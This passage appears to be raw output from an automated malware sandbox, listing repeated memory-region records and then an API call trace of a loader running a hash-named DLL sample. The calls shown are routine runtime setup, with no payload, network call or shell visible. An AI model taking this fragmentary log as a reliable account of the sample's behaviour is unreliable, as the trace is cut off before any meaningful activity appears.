"pagefile_0x00000000001b0000" filename = "" Region: id = 11822 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11823 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11824 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11825 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11826 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11827 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11828 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11829 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11830 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11831 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11832 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11833 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11834 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11835 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11836 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11837 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11838 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11839 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11840 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11841 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11842 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11843 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11844 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11845 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11846 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11847 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11848 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11849 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11850 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11851 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11852 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11853 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11854 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11855 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11856 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11857 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11858 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11859 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11860 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11861 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11862 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11863 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11864 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11865 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11866 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11867 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11868 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11869 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11870 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11871 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11872 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11873 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11874 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11875 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11876 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11877 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11878 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11879 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11880 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11881 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11882 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11883 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11884 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11885 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11886 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11887 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11888 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16796 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16797 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16798 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 16799 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 197 os_tid = 0x1024 [0192.754] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.754] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0192.755] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.755] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0192.755] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0192.755] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.756] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0192.756] GetProcessHeap () returned 0x550000 [0192.756] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.756] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0192.756] GetLastError () returned 0x7e [0192.757] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0192.757] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0192.757] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c8) returned 0x55c330 [0192.757] SetLastError (dwErrCode=0x7e) [0192.757] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1200) returned 0x563480 [0192.760] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0192.760] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0192.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0192.760] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0192.760] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options" [0192.760] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options" [0192.760] GetACP () returned 0x4e4 [0192.760] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x228) returned 0x555390 [0192.760] IsValidCodePage (CodePage=0x4e4) returned 1 [0192.760] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0192.760] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0192.760] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.760] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0192.760] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0192.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0192.761] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0192.761] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0192.761] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0192.761] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0192.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0192.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.761] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0192.762] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0192.762] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0192.762] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 